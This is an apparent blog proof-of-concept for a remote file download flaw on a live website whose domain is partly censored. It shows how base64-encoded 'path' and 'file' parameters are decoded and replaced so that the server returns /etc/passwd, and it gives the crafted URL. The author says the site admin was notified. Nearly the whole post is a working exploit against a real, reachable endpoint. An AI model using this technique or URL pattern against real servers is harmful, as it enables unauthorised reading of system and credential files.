Remote File Download Vulnerability


While browsing i found this cool remote file download vulnerability. :)

http://www.censored.or.id/index.php?m=default&s=download&path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==&file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==&hs=true

If i open link above, it will download a file for me. Now see the path and file parameter. It's base64 encrypt.

path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==
file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==

Decrypt both value and i got this.


path=system/modules/berita/files/download/
file=presentation_final.ppt

Now i know the path and the file name. What if i change it? Let see.

path=L2V0Yy8=
file=cGFzc3dk

I changed the path value with /etc/ and file value with passwd. Encrypt it to base64 first.

http://www.censored.or.id/index.php?m=default&s=download&path=L2V0Yy8=&file=cGFzc3dk&hs=true

This modified link will download passwd file from the system.



Thats it.. :)


*some link and value in this PoC has been cencored/changed coz this is a live website.
*admin is notified by email